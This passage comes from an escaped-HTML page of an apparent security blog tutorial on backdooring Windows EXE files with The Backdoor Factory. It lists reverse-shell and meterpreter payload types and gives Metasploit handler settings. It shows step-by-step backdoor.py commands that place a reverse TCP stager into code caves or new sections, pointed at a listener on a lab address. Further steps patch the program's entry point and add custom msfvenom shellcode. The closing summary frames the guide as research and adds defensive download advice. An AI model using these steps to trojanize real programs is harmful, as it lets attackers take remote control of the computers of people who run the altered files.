follows:\u003C\u002Fp>\u003Cul>\u003Cli>cave_miner_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline_threaded\u003C\u002Fli>\u003Cli>iat_reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>iat_user_supplied_shellcode_threaded\u003C\u002Fli>\u003Cli>meterpreter_reverse_https_threaded\u003C\u002Fli>\u003Cli>reverse_shell_tcp_inline\u003C\u002Fli>\u003Cli>reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>user_supplied_shellcode_threaded\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Name resolution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>cave_miner_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>As a payload template with a length of 135, it only implements control flow jumps and performs no other operations, serving as a template for custom shellcode development.\u003C\u002Fp>\u003Cp>The disassembled payload format is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017487710_3_d721473ed4-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>reverse_shell_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>meterpreter_reverse_https_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_https\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>iat in iat_reverse_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>iat stands for Import Address Table. If the PE file's IAT does not include the APIs LoadLibraryA and GetProcAddress, directly executing the payload reverse_shell_tcp_inline will fail. iat_reverse_tcp_inline adds functionality to repair the IAT to avoid execution failure.\u003C\u002Fp>\u003Cp>\u003Cstrong>user_supplied_shellcode_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Custom payload, which can be generated via msf.\u003C\u002Fp>\u003Ch3>3. Search for available Code Caves in the file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the payload length is 703, the Code Caves must satisfy a length greater than 703. Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c -l 703\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017497493_4_9b62c67208-1.jpeg\">\u003C\u002Fp>\u003Cp>Found three exploitable locations in total:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>No section\u003Cbr>-&gt;Begin Cave 0x240\u003Cbr>-&gt;End of Cave 0x1000\u003Cbr>Size of Cave (int) 3520\u003Cbr>**************************************************\u003Cbr>No section\u003Cbr>-&gt;Begin Cave 0x693a\u003Cbr>-&gt;End of Cave 0x700c\u003Cbr>Size of Cave (int) 1746\u003Cbr>**************************************************\u003Cbr>We have a winner: .data\u003Cbr>-&gt;Begin Cave 0x7051\u003Cbr>-&gt;End of Cave 0x7350\u003Cbr>Size of Cave (int) 767\u003Cbr>SizeOfRawData 0x1000\u003Cbr>PointerToRawData 0x7000\u003Cbr>End of Raw Data: 0x8000\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output address is a Relative Virtual Address (RVA), which is the offset address relative to the file header (base address Image Base)\u003C\u002Fp>\u003Cp>The actual address in memory (Virtual Address) = Image Base + RVA\u003C\u002Fp>\u003Cp>ImageBase = 0x00400000\u003C\u002Fp>\u003Cp>Use Immunity Debugger to view the memory structure for verification\u003C\u002Fp>\u003Cp>Memory structure as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017505897_5_cb528d3f77-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(1)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x240\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x1000\u003C\u002Fp>\u003Cp>Size of Cave (int) 3520\u003C\u002Fp>\u003Cp>Actual memory address is 0x00400240-0x00401000, located in the PE header, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017511367_6_a5650cbb10-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x693a\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x700c\u003C\u002Fp>\u003Cp>Size of Cave (int) 1746\u003C\u002Fp>\u003Cp>Actual memory address is 0x0040693a-0x0040700c, located in the .rdata section, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017516858_7_afee61644d-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(3)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>We have a winner: .data\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x7051\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x7350\u003C\u002Fp>\u003Cp>Size of Cave (int) 767\u003C\u002Fp>\u003Cp>Actual memory address is 0x00407051-0x00407350, located in the .data section with default RW permissions\u003C\u002Fp>\u003Cp>View memory address data as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017521356_8_7157a1aa5d-1.jpeg\">\u003C\u002Fp>\u003Cp>It can be seen that the Code Caves found through The Backdoor Factory all meet the requirements\u003C\u002Fp>\u003Ch3>4. Add payload\u003C\u002Fh3>\u003Cp>Here, reverse_tcp_stager_threaded is selected for testing, with a payload length of 703\u003C\u002Fp>\u003Cp>Server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(1) Add a new section to save the payload\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The new section is named .sdata with RWE permissions\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017524645_9_9ef2f8743b-1.jpeg\">\u003C\u002Fp>\u003Cp>If specifying the new section name as aaa, the parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -n aaa -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Save the payload into the .data section\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the .data section as prompted\u003C\u002Fp>\u003Cp>Change the .data section permissions to RWE, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017526812_10_c6ff04d607-1.jpeg\">\u003C\u002Fp>\u003Cp>Add jump code JMP TEST2.00407055 at the program entry point, where 0x00407055 stores the added payload\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017528213_11_46aa0eab2d-1.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Save payload to other segments\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test3.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the PE header as prompted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017530136_12_f89f65a0d1-1.jpeg\">\u003C\u002Fp>\u003Cp>Execution will report an error and needs to be fixed\u003C\u002Fp>\u003Cp>Use the tool nasm_shell to convert assembly code into hexadecimal data\u003C\u002Fp>\u003Cp>Kali2.0 integrates nasm_shell by default\u003C\u002Fp>\u003Cp>Tool usage is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017531304_13_1444d8a8ba-1.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Custom payload\u003C\u002Fh4>\u003Cp>Generate payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmessagebox -f raw &gt;msg.bin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s user_supplied_shellcode_threaded -U msg.bin -o test4.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Testing as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017532156_14_834d64cab9-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of implanting backdoors into EXE files using The Backdoor Factory, leveraging Code Caves to avoid altering the original file size.\u003C\u002Fp>\u003Cp>Of course, this exploitation method has already been detected by antivirus software. The content presented here is for technical research purposes only.\u003C\u002Fp>\u003Cp>From a defensive perspective, extra caution is required when downloading files: only download programs from trusted sources and verify file hashes.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1303,"Onedaysec",6,"published","2026-02-02T07:51:00.264Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Backdoor EXE Files with The Backdoor Factory - Implant Guide","backdoor implantation, EXE backdoor, The Backdoor Factory, code caves, PE file format, payload injection, reverse shell, meterpreter, shellcode",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],379,378,376,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.806Z","2026-07-23T16:01:28.822Z","draft","2026-07-23T16:05:45.242Z"]